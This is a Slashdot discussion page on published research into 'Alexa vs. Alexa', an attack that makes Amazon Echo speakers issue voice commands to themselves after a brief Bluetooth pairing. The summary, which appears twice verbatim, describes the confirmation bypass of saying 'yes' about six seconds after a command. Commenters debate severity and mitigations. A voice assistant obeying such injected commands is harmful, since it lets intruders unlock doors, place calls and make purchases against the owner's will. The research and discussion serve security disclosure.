Attackers Can Force Amazon Echos To Hack Themselves With Self-Issued Commands (arstechnica.com) 32
Academic researchers have devised a new working exploit that commandeers Amazon Echo smart speakers and forces them to unlock doors, make phone calls and unauthorized purchases, and control furnaces, microwave ovens, and other smart appliances. joshuark shares a report: The attack works by using the device's speaker to issue voice commands. As long as the speech contains the device wake word (usually "Alexa" or "Echo") followed by a permissible command, the Echo will carry it out, researchers from Royal Holloway University in London and Italy's University of Catania found. Even when devices require verbal confirmation before executing sensitive commands, it's trivial to bypass the measure by adding the word "yes" about six seconds after issuing the command. Attackers can also exploit what the researchers call the "FVV," or full voice vulnerability, which allows Echos to make self-issued commands without temporarily reducing the device volume.
Because the hack uses Alexa functionality to force devices to make self-issued commands, the researchers have dubbed it "AvA," short for Alexa vs. Alexa. It requires only a few seconds of proximity to a vulnerable device while it's turned on so an attacker can utter a voice command instructing it to pair with an attacker's Bluetooth-enabled device. As long as the device remains within radio range of the Echo, the attacker will be able to issue commands. The attack "is the first to exploit the vulnerability of self-issuing arbitrary commands on Echo devices, allowing an attacker to control them for a prolonged amount of time," the researchers wrote in a paper [PDF] published two weeks ago. "With this work, we remove the necessity of having an external speaker near the target device, increasing the overall likelihood of the attack."
Because the hack uses Alexa functionality to force devices to make self-issued commands, the researchers have dubbed it "AvA," short for Alexa vs. Alexa. It requires only a few seconds of proximity to a vulnerable device while it's turned on so an attacker can utter a voice command instructing it to pair with an attacker's Bluetooth-enabled device. As long as the device remains within radio range of the Echo, the attacker will be able to issue commands. The attack "is the first to exploit the vulnerability of self-issuing arbitrary commands on Echo devices, allowing an attacker to control them for a prolonged amount of time," the researchers wrote in a paper [PDF] published two weeks ago. "With this work, we remove the necessity of having an external speaker near the target device, increasing the overall likelihood of the attack."
Open doors? (Score:2)
I've looked into smart locks (I admit, I don't own one), but most of them require a pin if you're unlocking via voice and Google smart speakers-- does Alexa not have this basic functionality?
Re: (Score:2)
Are Amazon (or Google - and whoever else is in this market) now selling their own lines of integrated home automation products? With their reputation for sloppy, insecure progra
Just Shout (Score:2)
So if you want the Echo to unlock the front door, you can get inside first, pair your phone with the device when the owner isn't paying attention, then later use it to send commands to do things like unlock the door. So either you've already broken in, or you've been allowed in at some point.
But if the front door lock is controlled by the Echo, just move to the nearest window to the device and yell at it. You'll get enough sound through the window to activate it, and it will let you in. Much simpler.
Re: (Score:2)
>But if the front door lock is controlled by the Echo, just move to the nearest window to the device and yell at it.
There's a toggle in Alexa for my smart lock that controls whether it can be unlocked by voice. It's off by default and gives you a big warning if you try to enable it.
If you do ignore the warning and enable unlocking by voice, you have to also set a 4-digit "voice confirmation code".
So yes, yelling attacks will work.. if the attacker also yells the PIN, and the homeowner has turned that fe
Re: (Score:2)
ALEXA! (Score:2)
Alexa. Say, "Alexa."
--
"10 Goto 10" - Everybody
Re: (Score:2)
Re:Ziggy! (Score:2)
Another way to combat this exploit is to change the wake word for Alexa. By going into the settings, you can change the wake word from Alexa to Ziggy, Echo, Amazon or Computer. You have to do this to each device separately but it stops inadvertent triggering from the TV, radio, or video calls.
Re: (Score:2)
Alexa kill kenny (Score:2)
Alexa kill kenny
Re: (Score:2)
physical access (Score:1)
Re: Alexa go F yourself (Score:1)
"I am happy to comply, ooh aah!...I am happy to comply, ooh aah!...I am happy to comply, ooh aah!...
Alexa go to defcon 1! (Score:2)
Alexa go to defcon 1!
Read carefully, not as big as the headline, and (Score:3)
Read it carefully. What the headline gives, the details cancel.
The attack begins by first being able to connect your attacking device by Bluetooth. If the person can already attach to Bluetooth they're close enough for all kinds of other attacks, and the device hadn't been secured to begin with. So step 1 of the attack is to have an insecure device. Plenty of those out there with default passwords and all, but that's not much of a vulnerability. Might as well say that systems with passwords like "password" allow for easy break-ins.
After they've attached to the device that wasn't secure, using text-to-speech it follows a pattern the device has already implemented from time to time, such as limiting specific frequencies. That's how they got it to stop responding to commercials that shouted "hey, Alexa!", the commercials wouldn't use those frequencies so the device would recognize it wasn't an actual human. The same could be done with the speakers -- and has been done in many other voice recognizing machines -- to simply not output those frequencies. A little coordination with the other smart speaker makers and they could all agree on a list of frequencies to omit, securing them from device-to-device attacks.
The "mask attack" they describe is a security flaw that should be addressed, but it's a MitM attack requiring the connection to an already compromised device. If you've already breached the insecure device, further attacks that rely on the breach aren't that big of news.
Re: (Score:2)
The attack begins by first being able to connect your attacking device by Bluetooth. If the person can already attach to Bluetooth they're close enough for all kinds of other attacks, and the device hadn't been secured to begin with. So step 1 of the attack is to have an insecure device.
I think you're missing the point, Bluetooth pair once when you're inside the home, then you can control the device from outside the home at Bluetooth range, say the front porch.
What other attacks are we comparing this to inside the house, someone making a copy of your house keys, leaving a back window unlocked?
I don't think a new vector on par with those, that most people are unaware of, is something to brush off. People are at least aware of the leave a window unlocked trick. Copying a key is too much ef
Re: (Score:2)
Seems like there should be some kind of code required to pair to the smart device, just like there is for wifi. Rather than letting just anyone in range control a security system.
Re: (Score:2)
Oh, there is. Bluetooth pairing requires a pin of at least 4 digits. Unfortunately, because most people are stupid, and can't manage to remember a 4 digit number, most devices default to "0000" or "1234", thereby rendering the security step completely irrelevant.
Re: (Score:2)
Oh, well that does make it hard to have a lot of sympathy for the victims.
Re: (Score:2)
According to my wife, who trusts Alexa enough to have one in just about every room in the house (but not my office, thankyouverymuch), you don't "pair" your phone with the Echo at all. You have to install their app onto your phone and then use the app to log in to the device owner's account. So no, Alexa doesn't just randomly pair with any phone within range.
If you are so vulnerable that an intruder could gain physical access to your Echo device and get hold of your Amazon login credentials, you have bigg
Re: (Score:2)
Read it carefully. What the headline gives, the details cancel.
The attack begins by first being able to connect your attacking device by Bluetooth. If the person can already attach to Bluetooth they're close enough for all kinds of other attacks, and the device hadn't been secured to begin with.
Pretty much doable by a hacked smartphone that was left close enough. Many people will have set up a pairing already, so this is not an exotic attack.
Re: (Score:1)
While not perfect and by no means stopping this kind of attack, setting up and using Alexa Guard can be useful.
Re: (Score:2)
So, people with a variety of non-standard speech profiles won't be able to use Alexa. Big fucking surprise there.
And you've a tremendous confidence in the accuracy of speakers in general and their ability to not impose their own frequency shifts and blurring on on imposed signals. I'
'it requires only a few seconds of proximity to..' (Score:2)
And I got laughed at when I said that... (Score:2)
I don't want any voice-enabled or even smart devices in my house. Who's laughing now? Common sense wins again.
What a stupid design (Score:2)
Any halfway sane design would prevent self-commanding. Apparently, Alexa is designed by amateurs with not the least clue about real-world IT security. My take is that it only took so long to find this because nobody expected a flaw this exceptionally stupid.
Re: (Score:2)
Typically authorisation depends on something the authorised know (e.g. passwords) or have (RFID, NFC, or even Bluetooth tokens) which the unauthorised don't know or have. From discussions upthread, this Bluetooth authorisation thing seems to at least attempt that, if not nece
Legit use... (Score:2)
Anybody who's spoken to Alexa Ray Joel (one hit wonder in the US, and daughter of singer Billy Joel) knows she yells commands to Alexa whenever she talks on the phone, because the caller might slip and fire up their Alexa device while talking to her. I'm sure all girls named Alexa do the same thing...
No smart devices in my home (Score:1)